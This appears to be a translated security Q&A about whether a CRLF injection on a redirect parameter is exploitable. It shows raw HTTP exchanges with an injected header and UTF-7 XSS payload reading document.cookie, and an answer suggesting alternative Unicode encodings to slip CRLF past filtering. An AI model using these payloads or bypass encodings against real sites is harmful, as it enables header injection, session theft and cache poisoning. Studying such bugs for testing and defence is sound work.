如何开发CRLF注入？

Question

当我在一个网站上运行几个测试时，我发现：

请求：

GET /accounts?intended_destination=internal_api%2Fcampaigns_dashboard%7Cshow&intended_params=format%3Dhtml HTTP/1.1
Host: ads.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/
Cookie: asdfvsdgnsbaebvrasdxzsbdgnsdfgbasdfvzxbcbndsfbasdfxncbvnx
Connection: close
Cache-Control: max-age=0

在转发时，响应如下：

HTTP/1.1 302 Found
cache-control: no-cache, private
connection: close
content-security-policy: default-src 'self'; connect-src 'self' https://api.example.com https://*.online-metrix.net https://www.googleapis.com https://ton-u.example.com https://twadmedia.s3.amazonaws.com https://upload.example.com https://ajax.googleapis.com https://ssl.google-analytics.com https://stats.g.doubleclick.net; font-src 'self' data: https://ton.example.com https://ton.example.com https://fonts.gstatic.com; frame-src 'self' https://ton.example.com https://amp.twimg.com https://googleads.g.doubleclick.net https://*.online-metrix.net https://ton-u.example.com https://upload.example.com https://www.google.com https://www.googleadservices.com https://www.youtube.com; img-src 'self' https: http://ton.example.com http://*.twimg.com http://*.phobos.apple.com http://*.mzstatic.com https://api.mixpanel.com data:; media-src https://d1uzb6x3u3o65v.cloudfront.net https://ssl.gstatic.com; object-src 'self' https://ton.example.com https://*.online-metrix.net; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://ton.example.com https://*.online-metrix.net https://platform.example.com https://ssl.google-analytics.com https://support.example.com https://www.googleadservices.com https://stats.g.doubleclick.net https://ajax.googleapis.com https://ton.twimg.com https://syndication.example.com https://s1259914507.t.eloqua.com 'nonce-aIc2u/MH1CJ3bqmF45iuEwsSJbQkLPwLPAh6xGncfhg='; style-src 'self' 'unsafe-inline' https://ton.example.com https://support.example.com https://ads.example.com https://ton.twimg.com https://fonts.googleapis.com; report-uri https://example.com/i/csp_report?enforce=true&app_name=OBSWCY3PMNVQ%3D%3D%3D%3D;
content-type: text/html; charset=utf-8
date: Sun, 10 May 2015 06:14:41 GMT
location: https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard
server: tsa_f
set-cookie: ads_session=BAh7CiIMc2NyaWJlZFsGbCsJ0VNxAAAAEABJIg9jcmVhdGVkX2F0BjoGRUZsKwiFDGo8TQEiEF9jc3JmX3Rva2VuIjFjL2gvTmg4TEI3UmlsWlJIZFluZkdTRkw2eEtHOXQxeUpCNXNaQUpieGhVPSIPc2Vzc2lvbl9pZCIlZGRhODIyY2U3YzRmZTI0ZThkMWEyMDdjOTY3ZGY3MGRJIgpmbGFzaAY7AFRvOiVBY3Rpb25EaXNwYXRjaDo6Rmxhc2g6OkZsYXNoSGFzaAk6CkB1c2VkbzoIU2V0BjoKQGhhc2h7ADoMQGNsb3NlZEY6DUBmbGFzaGVzewc6CWluZm9bsdfvsdfvsdvsdverbwsryhmtyn--etrbetbervw; path=/; expires=Wed, 12-May-2015 06:14:41 GMT; secure; HttpOnly
status: 302 Found
strict-transport-security: max-age=631138519
x-connection-hash: fd9195a7ae2e806fbaa11f8c08aecba1
x-content-type-options: nosniff
x-download-options: noopen
x-frame-options: SAMEORIGIN
x-permitted-cross-domain-policies: none
x-rack-cache: miss
x-request-id: db23c20f08576fc1496bd0883286e2af
x-response-time: 526
x-runtime: 0.065751
x-ua-compatible: IE=Edge,chrome=1
x-xss-protection: 1; mode=BLOCK
Content-Length: 328

<html><body>You are being <a href="https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard>redirected</a>.</body></html>

在修改了几个小时的不同参数之后，我想我在"intended_params=format%3Dhtml“参数中找到了一个CLRF注入，它改变了位置头和重定向URL：

请求：

GET /accounts?intended_destination=internal_api%2Fcampaigns_dashboard%7Cshow&intended_params=%0d%0aContentType%3a%20text%2fhtml%3bcharset%3dUTF-7%0d%0aContent-Length%3a%20129%0d%0a%0d%0a%2BADw-html%2BAD4-%2BADw-body%2BAD4-%2BADw-script%2BAD4-alert%28%27XSS,cookies%3a%27%2Bdocument%2ecookie%29%2BADw-%2fscript%2BAD4-%2BADw-%2fbody%2BAD4-%2BADw-%2fhtml%2BAD4 HTTP/1.1
Host: ads.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/
Cookie: asdfvsdgnsbaebvrasdxzsbdgnsdfgbasdfvzxbcbndsfbasdfxncbvnx
Connection: close
Cache-Control: max-age=0

响应：

HTTP/1.1 302 Found
cache-control: no-cache, private
connection: close
content-security-policy: default-src 'self'; connect-src 'self' https://api.example.com https://*.online-metrix.net https://www.googleapis.com https://ton-u.example.com https://twadmedia.s3.amazonaws.com https://upload.example.com https://ajax.googleapis.com https://ssl.google-analytics.com https://stats.g.doubleclick.net; font-src 'self' data: https://ton.example.com https://ton.example.com https://fonts.gstatic.com; frame-src 'self' https://ton.example.com https://amp.twimg.com https://googleads.g.doubleclick.net https://*.online-metrix.net https://ton-u.example.com https://upload.example.com https://www.google.com https://www.googleadservices.com https://www.youtube.com; img-src 'self' https: http://ton.example.com http://*.twimg.com http://*.phobos.apple.com http://*.mzstatic.com https://api.mixpanel.com data:; media-src https://d1uzb6x3u3o65v.cloudfront.net https://ssl.gstatic.com; object-src 'self' https://ton.example.com https://*.online-metrix.net; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://ton.example.com https://*.online-metrix.net https://platform.example.com https://ssl.google-analytics.com https://support.example.com https://www.googleadservices.com https://stats.g.doubleclick.net https://ajax.googleapis.com https://ton.twimg.com https://syndication.example.com https://s1259914507.t.eloqua.com 'nonce-aIc2u/MH1CJ3bqmF45iuEwsSJbQkLPwLPAh6xGncfhg='; style-src 'self' 'unsafe-inline' https://ton.example.com https://support.example.com https://ads.example.com https://ton.twimg.com https://fonts.googleapis.com; report-uri https://example.com/i/csp_report?enforce=true&app_name=OBSWCY3PMNVQ%3D%3D%3D%3D;
content-type: text/html; charset=utf-8
date: Sun, 10 May 2015 06:14:41 GMT
location: https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard?charset=UTF-7%0D%0AContent-Length%3A+129%0D%0A%0D%0A+ADw-html+AD4-+ADw-body+AD4-+ADw-script+AD4-alert%28%27XSS%2Ccookies%3A%27+document.cookie%29+ADw-%2Fscript+AD4-+ADw-%2Fbody+AD4-+ADw-%2Fhtml+AD4
server: tsa_f
set-cookie: ads_session=BAh7CiIMc2NyaWJlZFsGbCsJ0VNxAAAAEABJIg9jcmVhdGVkX2F0BjoGRUZsKwiFDGo8TQEiEF9jc3JmX3Rva2VuIjFjL2gvTmg4TEI3UmlsWlJIZFluZkdTRkw2eEtHOXQxeUpCNXNaQUpieGhVPSIPc2Vzc2lvbl9pZCIlZGRhODIyY2U3YzRmZTI0ZThkMWEyMDdjOTY3ZGY3MGRJIgpmbGFzaAY7AFRvOiVBY3Rpb25EaXNwYXRjaDo6Rmxhc2g6OkZsYXNoSGFzaAk6CkB1c2VkbzoIU2V0BjoKQGhhc2h7ADoMQGNsb3NlZEY6DUBmbGFzaGVzewc6CWluZm9bsdfvsdfvsdvsdverbwsryhmtyn--etrbetbervw; path=/; expires=Wed, 12-May-2015 06:14:41 GMT; secure; HttpOnly
status: 302 Found
strict-transport-security: max-age=631138519
x-connection-hash: fd9195a7ae2e806fbaa11f8c08aecba1
x-content-type-options: nosniff
x-download-options: noopen
x-frame-options: SAMEORIGIN
x-permitted-cross-domain-policies: none
x-rack-cache: miss
x-request-id: db23c20f08576fc1496bd0883286e2af
x-response-time: 526
x-runtime: 0.065751
x-ua-compatible: IE=Edge,chrome=1
x-xss-protection: 1; mode=BLOCK
Content-Length: 328

<html><body>You are being <a href="https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard?charset=UTF-7%0D%0AContent-Length%3A+129%0D%0A%0D%0A+ADw-html+AD4-+ADw-body+AD4-+ADw-script+AD4-alert%28%27XSS%2Ccookies%3A%27+document.cookie%29+ADw-%2Fscript+AD4-+ADw-%2Fbody+AD4-+ADw-%2Fhtml+AD4">redirected</a>.</body></html>

这种行为在某种程度上是可以利用的吗？您可以使用它来设置cookie或导致HTTP拆分响应吗？

提前谢谢。

Answer 1

正如@Gumbo所说，CRLF在结果URL中正确编码%0d%0a，如您所见。如果在传递参数时设置了标头，则会分别看到这些标头。您可以尝试不同的编码方式，例如%E5%98%8A%E5%98%8D :)

攻击者构建任意HTTP响应的能力允许各种由此产生的攻击，包括:跨用户破坏、web和浏览器缓存中毒、跨站点脚本编写和页面劫持。

如果您能够拆分响应，您可以执行其他这里定义的攻击。这解释了如果S/他能够操纵HTTP报头，可以执行什么攻击。

头由一个CRLF隔开，响应的头与正文分开两个，允许您插入自己伪造的内容。

但是，由于响应是302，所以很难利用。虽然，您可能会发现以下有趣的，请看一下。

http://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html

尽管302次重定向，作者还是设法在IE中触发了XSS。